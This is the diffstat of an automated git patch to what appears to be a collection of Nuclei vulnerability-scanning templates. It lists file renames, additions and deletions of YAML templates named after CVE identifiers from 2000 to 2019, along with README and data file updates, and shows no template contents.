From 08722bb55d40b45a07e3dbddd0f9ab052a66e8da Mon Sep 17 00:00:00 2001 From: test Date: Fri, 9 Aug 2024 02:15:58 +0000 Subject: [PATCH] Auto Updated --- README.md | 152 +- data.json | 3 +- data1.json | 103 +- links.csv | 1 + nuclei-templates/CVE-2000/CVE-2000-0114.yaml | 32 + nuclei-templates/CVE-2000/cve-2000-0114.yaml | 32 - nuclei-templates/CVE-2006/CVE-2006-1681.yaml | 36 - nuclei-templates/CVE-2006/cve-2006-1681.yaml | 34 + ...{cve-2007-5728.yaml => CVE-2007-5728.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-2398.yaml | 38 - ...{cve-2008-2650.yaml => CVE-2008-2650.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-4668.yaml | 31 - nuclei-templates/CVE-2008/CVE-2008-6080.yaml | 31 - nuclei-templates/CVE-2008/cve-2008-2398.yaml | 35 + nuclei-templates/CVE-2008/cve-2008-4668.yaml | 31 + nuclei-templates/CVE-2008/cve-2008-6080.yaml | 31 + nuclei-templates/CVE-2009/CVE-2009-0545.yaml | 7 +- ...{cve-2009-0932.yaml => CVE-2009-0932.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-1496.yaml | 31 - nuclei-templates/CVE-2009/CVE-2009-1558.yaml | 30 - nuclei-templates/CVE-2009/CVE-2009-2100.yaml | 31 - nuclei-templates/CVE-2009/CVE-2009-3053.yaml | 31 - ...{cve-2009-3318.yaml => CVE-2009-3318.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-4202.yaml | 33 - nuclei-templates/CVE-2009/CVE-2009-4223.yaml | 28 + nuclei-templates/CVE-2009/CVE-2009-4679.yaml | 34 - nuclei-templates/CVE-2009/cve-2009-1496.yaml | 30 + nuclei-templates/CVE-2009/cve-2009-1558.yaml | 30 + nuclei-templates/CVE-2009/cve-2009-2100.yaml | 31 + nuclei-templates/CVE-2009/cve-2009-3053.yaml | 31 + nuclei-templates/CVE-2009/cve-2009-4202.yaml | 31 + nuclei-templates/CVE-2009/cve-2009-4223.yaml | 30 - nuclei-templates/CVE-2009/cve-2009-4679.yaml | 31 + nuclei-templates/CVE-2010/CVE-2010-0219.yaml | 49 - nuclei-templates/CVE-2010/CVE-2010-0696.yaml | 27 - nuclei-templates/CVE-2010/CVE-2010-0944.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-0972.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-0982.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-0985.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-1217.yaml | 30 - ...{cve-2010-1305.yaml => CVE-2010-1305.yaml} | 0 ...{cve-2010-1306.yaml => CVE-2010-1306.yaml} | 0 ...{cve-2010-1307.yaml => CVE-2010-1307.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1313.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1469.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1470.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1473.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1475.yaml | 28 - ...{cve-2010-1476.yaml => CVE-2010-1476.yaml} | 0 ...{cve-2010-1491.yaml => CVE-2010-1491.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1531.yaml | 29 - nuclei-templates/CVE-2010/CVE-2010-1532.yaml | 30 - ...{cve-2010-1534.yaml => CVE-2010-1534.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1540.yaml | 30 - ...{cve-2010-1601.yaml => CVE-2010-1601.yaml} | 0 ...{cve-2010-1602.yaml => CVE-2010-1602.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1653.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-1714.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1715.yaml | 30 - ...{cve-2010-1717.yaml => CVE-2010-1717.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1718.yaml | 30 - ...{cve-2010-1719.yaml => CVE-2010-1719.yaml} | 0 ...{cve-2010-1722.yaml => CVE-2010-1722.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1871.yaml | 23 - ...{cve-2010-1878.yaml => CVE-2010-1878.yaml} | 0 ...{cve-2010-1952.yaml => CVE-2010-1952.yaml} | 0 ...{cve-2010-1953.yaml => CVE-2010-1953.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1954.yaml | 30 - nuclei-templates/CVE-2010/CVE-2010-1957.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-1979.yaml | 32 - ...{cve-2010-1983.yaml => CVE-2010-1983.yaml} | 0 ...{cve-2010-2033.yaml => CVE-2010-2033.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2035.yaml | 34 - ...{cve-2010-2050.yaml => CVE-2010-2050.yaml} | 0 ...{cve-2010-2128.yaml => CVE-2010-2128.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2259.yaml | 32 - ...{cve-2010-2307.yaml => CVE-2010-2307.yaml} | 0 ...{cve-2010-2861.yaml => CVE-2010-2861.yaml} | 0 ...{cve-2010-2918.yaml => CVE-2010-2918.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2920.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-3426.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-4239.yaml | 31 + ...{cve-2010-4617.yaml => CVE-2010-4617.yaml} | 0 ...{cve-2010-4769.yaml => CVE-2010-4769.yaml} | 0 ...{cve-2010-5028.yaml => CVE-2010-5028.yaml} | 0 ...{cve-2010-5278.yaml => CVE-2010-5278.yaml} | 0 ...{cve-2010-5286.yaml => CVE-2010-5286.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-0219.yaml | 53 + nuclei-templates/CVE-2010/cve-2010-0696.yaml | 31 + nuclei-templates/CVE-2010/cve-2010-0944.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-0972.yaml | 29 + nuclei-templates/CVE-2010/cve-2010-0982.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-0985.yaml | 30 + ...{CVE-2010-1056.yaml => cve-2010-1056.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1217.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1313.yaml | 29 + ...{CVE-2010-1314.yaml => cve-2010-1314.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1469.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1470.yaml | 29 + nuclei-templates/CVE-2010/cve-2010-1473.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1475.yaml | 29 + ...{CVE-2010-1495.yaml => cve-2010-1495.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1531.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1532.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1540.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1653.yaml | 30 + ...{CVE-2010-1658.yaml => cve-2010-1658.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1714.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1715.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1718.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1871.yaml | 24 + nuclei-templates/CVE-2010/cve-2010-1954.yaml | 30 + nuclei-templates/CVE-2010/cve-2010-1957.yaml | 33 + nuclei-templates/CVE-2010/cve-2010-1979.yaml | 33 + nuclei-templates/CVE-2010/cve-2010-2035.yaml | 34 + ...{CVE-2010-2045.yaml => cve-2010-2045.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-2259.yaml | 34 + nuclei-templates/CVE-2010/cve-2010-2920.yaml | 33 + nuclei-templates/CVE-2010/cve-2010-3426.yaml | 34 + nuclei-templates/CVE-2010/cve-2010-4239.yaml | 34 - ...{cve-2011-1669.yaml => CVE-2011-1669.yaml} | 0 ...{cve-2011-2780.yaml => CVE-2011-2780.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-4336.yaml | 41 - ...{cve-2011-4624.yaml => CVE-2011-4624.yaml} | 0 nuclei-templates/CVE-2011/cve-2011-4336.yaml | 41 + ...{CVE-2011-5106.yaml => cve-2011-5106.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-0392.yaml | 34 - nuclei-templates/CVE-2012/CVE-2012-0896.yaml | 31 - ...{cve-2012-1823.yaml => CVE-2012-1823.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-1835.yaml | 42 - ...{cve-2012-2371.yaml => CVE-2012-2371.yaml} | 0 ...{cve-2012-3153.yaml => CVE-2012-3153.yaml} | 0 nuclei-templates/CVE-2012/CVE-2012-4253.yaml | 31 - nuclei-templates/CVE-2012/CVE-2012-4547.yaml | 40 - ...{cve-2012-4889.yaml => CVE-2012-4889.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-0392.yaml | 34 + nuclei-templates/CVE-2012/cve-2012-0896.yaml | 33 + ...{CVE-2012-0901.yaml => cve-2012-0901.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-1835.yaml | 42 + nuclei-templates/CVE-2012/cve-2012-4253.yaml | 33 + ...{CVE-2012-4273.yaml => cve-2012-4273.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-4547.yaml | 40 + ...{cve-2013-2251.yaml => CVE-2013-2251.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-2287.yaml | 37 - nuclei-templates/CVE-2013/CVE-2013-3526.yaml | 37 - nuclei-templates/CVE-2013/CVE-2013-6281.yaml | 41 + ...{cve-2013-7240.yaml => CVE-2013-7240.yaml} | 0 nuclei-templates/CVE-2013/cve-2013-2287.yaml | 37 + nuclei-templates/CVE-2013/cve-2013-3526.yaml | 38 + nuclei-templates/CVE-2013/cve-2013-6281.yaml | 49 - nuclei-templates/CVE-2014/CVE-2014-1203.yaml | 35 - nuclei-templates/CVE-2014/CVE-2014-2321.yaml | 29 + nuclei-templates/CVE-2014/CVE-2014-2323.yaml | 31 - nuclei-templates/CVE-2014/CVE-2014-2383.yaml | 38 - nuclei-templates/CVE-2014/CVE-2014-2962.yaml | 32 - nuclei-templates/CVE-2014/CVE-2014-3120.yaml | 55 - nuclei-templates/CVE-2014/CVE-2014-3206.yaml | 38 - ...{cve-2014-3704.yaml => CVE-2014-3704.yaml} | 0 ...{cve-2014-4210.yaml => CVE-2014-4210.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4535.yaml | 39 - ...{cve-2014-4539.yaml => CVE-2014-4539.yaml} | 0 ...{cve-2014-4544.yaml => CVE-2014-4544.yaml} | 0 ...{cve-2014-4550.yaml => CVE-2014-4550.yaml} | 0 ...{cve-2014-4592.yaml => CVE-2014-4592.yaml} | 0 ...{cve-2014-4940.yaml => CVE-2014-4940.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4942.yaml | 34 + ...{cve-2014-5258.yaml => CVE-2014-5258.yaml} | 0 ...{cve-2014-5368.yaml => CVE-2014-5368.yaml} | 0 ...{cve-2014-6271.yaml => CVE-2014-6271.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-8799.yaml | 36 - ...{cve-2014-9444.yaml => CVE-2014-9444.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-9608.yaml | 39 - nuclei-templates/CVE-2014/cve-2014-1203.yaml | 39 + nuclei-templates/CVE-2014/cve-2014-2321.yaml | 36 - nuclei-templates/CVE-2014/cve-2014-2323.yaml | 32 + nuclei-templates/CVE-2014/cve-2014-2383.yaml | 42 + nuclei-templates/CVE-2014/cve-2014-2962.yaml | 34 + nuclei-templates/CVE-2014/cve-2014-3120.yaml | 60 + nuclei-templates/CVE-2014/cve-2014-3206.yaml | 38 + nuclei-templates/CVE-2014/cve-2014-4535.yaml | 40 + nuclei-templates/CVE-2014/cve-2014-4942.yaml | 45 - ...{CVE-2014-8682.yaml => cve-2014-8682.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-8799.yaml | 37 + nuclei-templates/CVE-2014/cve-2014-9608.yaml | 40 + ...{cve-2015-0554.yaml => CVE-2015-0554.yaml} | 0 .../CVE-2015/CVE-2015-1000012.yaml | 36 - ...{cve-2015-1880.yaml => CVE-2015-1880.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-2067.yaml | 34 - ...{cve-2015-2068.yaml => CVE-2015-2068.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-3224.yaml | 38 - nuclei-templates/CVE-2015/CVE-2015-3337.yaml | 34 - ...{cve-2015-3897.yaml => CVE-2015-3897.yaml} | 0 ...{cve-2015-4414.yaml => CVE-2015-4414.yaml} | 0 ...{cve-2015-5461.yaml => CVE-2015-5461.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-5471.yaml | 23 - nuclei-templates/CVE-2015/CVE-2015-6544.yaml | 42 - nuclei-templates/CVE-2015/CVE-2015-7377.yaml | 34 - nuclei-templates/CVE-2015/CVE-2015-7450.yaml | 61 - nuclei-templates/CVE-2015/CVE-2015-7823.yaml | 27 - ...{cve-2015-8349.yaml => CVE-2015-8349.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-8399.yaml | 40 - ...{cve-2015-8813.yaml => CVE-2015-8813.yaml} | 0 ...{cve-2015-9414.yaml => CVE-2015-9414.yaml} | 0 .../CVE-2015/cve-2015-1000012.yaml | 33 + nuclei-templates/CVE-2015/cve-2015-2067.yaml | 30 + nuclei-templates/CVE-2015/cve-2015-3224.yaml | 43 + nuclei-templates/CVE-2015/cve-2015-3337.yaml | 31 + nuclei-templates/CVE-2015/cve-2015-5471.yaml | 37 + nuclei-templates/CVE-2015/cve-2015-6544.yaml | 40 + nuclei-templates/CVE-2015/cve-2015-7377.yaml | 36 + nuclei-templates/CVE-2015/cve-2015-7450.yaml | 59 + nuclei-templates/CVE-2015/cve-2015-7823.yaml | 25 + nuclei-templates/CVE-2015/cve-2015-8399.yaml | 37 + ...{CVE-2015-9480.yaml => cve-2015-9480.yaml} | 0 ...{cve-2016-0957.yaml => CVE-2016-0957.yaml} | 0 ...016-1000128.yaml => CVE-2016-1000128.yaml} | 0 .../CVE-2016/CVE-2016-1000131.yaml | 39 - .../CVE-2016/CVE-2016-1000133.yaml | 39 - ...016-1000138.yaml => CVE-2016-1000138.yaml} | 0 ...016-1000139.yaml => CVE-2016-1000139.yaml} | 0 ...016-1000140.yaml => CVE-2016-1000140.yaml} | 0 ...016-1000142.yaml => CVE-2016-1000142.yaml} | 0 .../CVE-2016/CVE-2016-1000143.yaml | 37 - .../CVE-2016/CVE-2016-1000149.yaml | 39 - .../CVE-2016/CVE-2016-1000152.yaml | 39 - .../CVE-2016/CVE-2016-1000154.yaml | 39 - nuclei-templates/CVE-2016/CVE-2016-10033.yaml | 56 - ...ve-2016-10924.yaml => CVE-2016-10924.yaml} | 0 ...ve-2016-10960.yaml => CVE-2016-10960.yaml} | 0 ...{cve-2016-2389.yaml => CVE-2016-2389.yaml} | 0 ...{cve-2016-3081.yaml => CVE-2016-3081.yaml} | 0 ...{cve-2016-3978.yaml => CVE-2016-3978.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-4977.yaml | 37 - nuclei-templates/CVE-2016/CVE-2016-6210.yaml | 29 + ...{cve-2016-7552.yaml => CVE-2016-7552.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-8527.yaml | 42 - .../CVE-2016/cve-2016-1000131.yaml | 39 + .../CVE-2016/cve-2016-1000133.yaml | 39 + .../CVE-2016/cve-2016-1000143.yaml | 38 + .../CVE-2016/cve-2016-1000149.yaml | 39 + .../CVE-2016/cve-2016-1000152.yaml | 39 + .../CVE-2016/cve-2016-1000154.yaml | 39 + nuclei-templates/CVE-2016/cve-2016-10033.yaml | 56 + nuclei-templates/CVE-2016/cve-2016-4977.yaml | 37 + nuclei-templates/CVE-2016/cve-2016-6210.yaml | 33 - nuclei-templates/CVE-2016/cve-2016-8527.yaml | 40 + .../CVE-2017/CVE-2017-1000028.yaml | 44 - nuclei-templates/CVE-2017/CVE-2017-10271.yaml | 99 - ...ve-2017-10974.yaml => CVE-2017-10974.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-11610.yaml | 58 - ...ve-2017-12149.yaml => CVE-2017-12149.yaml} | 0 ...ve-2017-12544.yaml => CVE-2017-12544.yaml} | 0 ...ve-2017-12611.yaml => CVE-2017-12611.yaml} | 0 ...ve-2017-12615.yaml => CVE-2017-12615.yaml} | 0 ...ve-2017-12629.yaml => CVE-2017-12629.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-12794.yaml | 42 - nuclei-templates/CVE-2017/CVE-2017-14535.yaml | 42 - ...ve-2017-14651.yaml => CVE-2017-14651.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-15287.yaml | 32 - ...ve-2017-15363.yaml => CVE-2017-15363.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-15647.yaml | 36 - ...ve-2017-16806.yaml => CVE-2017-16806.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-17451.yaml | 35 - ...{cve-2017-3528.yaml => CVE-2017-3528.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-4011.yaml | 38 - ...{cve-2017-5638.yaml => CVE-2017-5638.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-6090.yaml | 51 - nuclei-templates/CVE-2017/CVE-2017-7615.yaml | 43 - nuclei-templates/CVE-2017/CVE-2017-8917.yaml | 37 - ...{cve-2017-9288.yaml => CVE-2017-9288.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-9791.yaml | 45 - nuclei-templates/CVE-2017/CVE-2017-9833.yaml | 35 - nuclei-templates/CVE-2017/CVE-2017-9841.yaml | 77 - .../CVE-2017/cve-2017-1000028.yaml | 41 + nuclei-templates/CVE-2017/cve-2017-10271.yaml | 96 + nuclei-templates/CVE-2017/cve-2017-11610.yaml | 56 + nuclei-templates/CVE-2017/cve-2017-12794.yaml | 42 + nuclei-templates/CVE-2017/cve-2017-14535.yaml | 42 + nuclei-templates/CVE-2017/cve-2017-15287.yaml | 32 + nuclei-templates/CVE-2017/cve-2017-15647.yaml | 33 + nuclei-templates/CVE-2017/cve-2017-17451.yaml | 39 + ...VE-2017-18536.yaml => cve-2017-18536.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-4011.yaml | 36 + ...{CVE-2017-5487.yaml => cve-2017-5487.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-6090.yaml | 49 + nuclei-templates/CVE-2017/cve-2017-7615.yaml | 44 + nuclei-templates/CVE-2017/cve-2017-8917.yaml | 32 + nuclei-templates/CVE-2017/cve-2017-9791.yaml | 45 + nuclei-templates/CVE-2017/cve-2017-9833.yaml | 35 + nuclei-templates/CVE-2017/cve-2017-9841.yaml | 77 + .../CVE-2018/CVE-2018-1000856.yaml | 52 - .../CVE-2018/CVE-2018-1000861.yaml | 37 - ...ve-2018-10201.yaml => CVE-2018-10201.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10230.yaml | 36 + ...ve-2018-10818.yaml => CVE-2018-10818.yaml} | 0 ...ve-2018-10823.yaml => CVE-2018-10823.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10956.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-11231.yaml | 38 + ...ve-2018-11510.yaml => CVE-2018-11510.yaml} | 0 ...ve-2018-11709.yaml => CVE-2018-11709.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-11776.yaml | 37 - nuclei-templates/CVE-2018/CVE-2018-11784.yaml | 20 - ...ve-2018-12031.yaml => CVE-2018-12031.yaml} | 0 ...ve-2018-12054.yaml => CVE-2018-12054.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-12300.yaml | 28 - nuclei-templates/CVE-2018/CVE-2018-12613.yaml | 38 - nuclei-templates/CVE-2018/CVE-2018-1271.yaml | 30 - nuclei-templates/CVE-2018/CVE-2018-13379.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-13980.yaml | 36 - ...ve-2018-14064.yaml => CVE-2018-14064.yaml} | 0 ...ve-2018-14574.yaml => CVE-2018-14574.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-14916.yaml | 31 - ...ve-2018-14918.yaml => CVE-2018-14918.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-15473.yaml | 29 + nuclei-templates/CVE-2018/CVE-2018-15657.yaml | 28 + ...ve-2018-15745.yaml => CVE-2018-15745.yaml} | 0 ...ve-2018-15961.yaml => CVE-2018-15961.yaml} | 0 ...ve-2018-16059.yaml => CVE-2018-16059.yaml} | 0 ...ve-2018-16133.yaml => CVE-2018-16133.yaml} | 0 ...ve-2018-16167.yaml => CVE-2018-16167.yaml} | 0 ...ve-2018-16288.yaml => CVE-2018-16288.yaml} | 0 ...ve-2018-16299.yaml => CVE-2018-16299.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-16341.yaml | 26 - nuclei-templates/CVE-2018/CVE-2018-16671.yaml | 30 - ...ve-2018-17422.yaml => CVE-2018-17422.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-18069.yaml | 37 - nuclei-templates/CVE-2018/CVE-2018-18608.yaml | 39 - nuclei-templates/CVE-2018/CVE-2018-18775.yaml | 30 - nuclei-templates/CVE-2018/CVE-2018-18777.yaml | 24 - nuclei-templates/CVE-2018/CVE-2018-18778.yaml | 30 - ...ve-2018-18925.yaml => CVE-2018-18925.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19137.yaml | 43 - ...ve-2018-19326.yaml => CVE-2018-19326.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19365.yaml | 31 - ...ve-2018-19458.yaml => CVE-2018-19458.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-19751.yaml | 52 + nuclei-templates/CVE-2018/CVE-2018-19753.yaml | 31 - nuclei-templates/CVE-2018/CVE-2018-19914.yaml | 46 + nuclei-templates/CVE-2018/CVE-2018-20009.yaml | 47 + nuclei-templates/CVE-2018/CVE-2018-20011.yaml | 47 + ...{cve-2018-2893.yaml => CVE-2018-2893.yaml} | 0 ...{cve-2018-2894.yaml => CVE-2018-2894.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-5230.yaml | 7 +- ...{cve-2018-5233.yaml => CVE-2018-5233.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-6200.yaml | 28 - nuclei-templates/CVE-2018/CVE-2018-6910.yaml | 39 - nuclei-templates/CVE-2018/CVE-2018-7422.yaml | 41 - ...{cve-2018-7602.yaml => CVE-2018-7602.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-7662.yaml | 37 + nuclei-templates/CVE-2018/CVE-2018-7700.yaml | 36 - nuclei-templates/CVE-2018/CVE-2018-7719.yaml | 32 - nuclei-templates/CVE-2018/CVE-2018-8033.yaml | 41 - nuclei-templates/CVE-2018/CVE-2018-8719.yaml | 36 - ...{cve-2018-9118.yaml => CVE-2018-9118.yaml} | 0 ...018-1000226.yaml => cve-2018-1000226.yaml} | 0 .../CVE-2018/cve-2018-1000856.yaml | 61 + .../CVE-2018/cve-2018-1000861.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-10230.yaml | 43 - nuclei-templates/CVE-2018/cve-2018-10956.yaml | 35 + nuclei-templates/CVE-2018/cve-2018-11231.yaml | 44 - nuclei-templates/CVE-2018/cve-2018-11776.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-11784.yaml | 30 + nuclei-templates/CVE-2018/cve-2018-12300.yaml | 28 + nuclei-templates/CVE-2018/cve-2018-12613.yaml | 35 + nuclei-templates/CVE-2018/cve-2018-1271.yaml | 28 + nuclei-templates/CVE-2018/cve-2018-13379.yaml | 28 + nuclei-templates/CVE-2018/cve-2018-13980.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-14916.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-15473.yaml | 29 - nuclei-templates/CVE-2018/cve-2018-15657.yaml | 30 - nuclei-templates/CVE-2018/cve-2018-16341.yaml | 20 + nuclei-templates/CVE-2018/cve-2018-16671.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-18069.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-18608.yaml | 46 + nuclei-templates/CVE-2018/cve-2018-18775.yaml | 37 + nuclei-templates/CVE-2018/cve-2018-18777.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-18778.yaml | 31 + nuclei-templates/CVE-2018/cve-2018-19137.yaml | 51 + nuclei-templates/CVE-2018/cve-2018-19365.yaml | 35 + nuclei-templates/CVE-2018/cve-2018-19751.yaml | 62 - nuclei-templates/CVE-2018/cve-2018-19753.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-19914.yaml | 54 - nuclei-templates/CVE-2018/cve-2018-20009.yaml | 54 - nuclei-templates/CVE-2018/cve-2018-20011.yaml | 54 - ...{CVE-2018-6008.yaml => cve-2018-6008.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-6200.yaml | 37 + ...{CVE-2018-6389.yaml => cve-2018-6389.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-6910.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-7422.yaml | 38 + ...{CVE-2018-7467.yaml => cve-2018-7467.yaml} | 0 nuclei-templates/CVE-2018/cve-2018-7662.yaml | 41 - nuclei-templates/CVE-2018/cve-2018-7700.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-7719.yaml | 34 + nuclei-templates/CVE-2018/cve-2018-8033.yaml | 36 + nuclei-templates/CVE-2018/cve-2018-8719.yaml | 36 + nuclei-templates/CVE-2019/CVE-2019-0221.yaml | 46 - ...ve-2019-10232.yaml => CVE-2019-10232.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-10475.yaml | 39 - nuclei-templates/CVE-2019/CVE-2019-10717.yaml | 38 + nuclei-templates/CVE-2019/CVE-2019-10758.yaml | 36 - nuclei-templates/CVE-2019/CVE-2019-11013.yaml | 24 - nuclei-templates/CVE-2019/CVE-2019-11043.yaml | 17 - ...ve-2019-11248.yaml => CVE-2019-11248.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-11370.yaml | 39 + ...ve-2019-11580.yaml => CVE-2019-11580.yaml} | 0 ...ve-2019-12725.yaml => CVE-2019-12725.yaml} | 0 ...ve-2019-13392.yaml => CVE-2019-13392.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-13396.yaml | 37 - ...ve-2019-13462.yaml => CVE-2019-13462.yaml} | 0 ...ve-2019-14223.yaml => CVE-2019-14223.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14251.yaml | 31 - ...ve-2019-14312.yaml => CVE-2019-14312.yaml} | 0 ...ve-2019-14470.yaml => CVE-2019-14470.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-14696.yaml | 42 - ...ve-2019-14974.yaml => CVE-2019-14974.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-15107.yaml | 37 - nuclei-templates/CVE-2019/CVE-2019-15811.yaml | 42 - ...ve-2019-16278.yaml => CVE-2019-16278.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-1653.yaml | 39 - ...ve-2019-16759.yaml => CVE-2019-16759.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-16932.yaml | 41 - nuclei-templates/CVE-2019/CVE-2019-16996.yaml | 32 - ...ve-2019-17538.yaml => CVE-2019-17538.yaml} | 0 ...ve-2019-17558.yaml => CVE-2019-17558.yaml} | 0 ...ve-2019-18393.yaml => CVE-2019-18393.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-18665.yaml | 30 + ...ve-2019-18818.yaml => CVE-2019-18818.yaml} | 0 ...ve-2019-19908.yaml => CVE-2019-19908.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-19985.yaml | 43 - ...ve-2019-20085.yaml => CVE-2019-20085.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-20210.yaml | 37 + nuclei-templates/CVE-2019/CVE-2019-20354.yaml | 18 - nuclei-templates/CVE-2019/CVE-2019-20933.yaml | 32 + nuclei-templates/CVE-2019/CVE-2019-2616.yaml | 29 - ...{cve-2019-2767.yaml => CVE-2019-2767.yaml} | 0 ...{cve-2019-3396.yaml => CVE-2019-3396.yaml} | 0 ...{cve-2019-3799.yaml => CVE-2019-3799.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-3912.yaml | 28 - ...{cve-2019-7219.yaml => CVE-2019-7219.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-7254.yaml | 25 - nuclei-templates/CVE-2019/CVE-2019-7315.yaml | 29 - nuclei-templates/CVE-2019/CVE-2019-7609.yaml | 45 - nuclei-templates/CVE-2019/CVE-2019-8442.yaml | 28 - ...{cve-2019-8449.yaml => CVE-2019-8449.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-8451.yaml | 38 - ...{cve-2019-8903.yaml => CVE-2019-8903.yaml} | 0 ...{cve-2019-8937.yaml => CVE-2019-8937.yaml} | 0 ...{cve-2019-8982.yaml => CVE-2019-8982.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9041.yaml | 39 - nuclei-templates/CVE-2019/CVE-2019-9082.yaml | 1 - ...{cve-2019-9726.yaml => CVE-2019-9726.yaml} | 0 nuclei-templates/CVE-2019/CVE-2019-9915.yaml | 32 + nuclei-templates/CVE-2019/CVE-2019-9922.yaml | 28 + nuclei-templates/CVE-2019/cve-2019-0221.yaml | 44 + nuclei-templates/CVE-2019/cve-2019-10475.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-10717.yaml | 43 - nuclei-templates/CVE-2019/cve-2019-10758.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-11013.yaml | 34 + nuclei-templates/CVE-2019/cve-2019-11043.yaml | 21 + 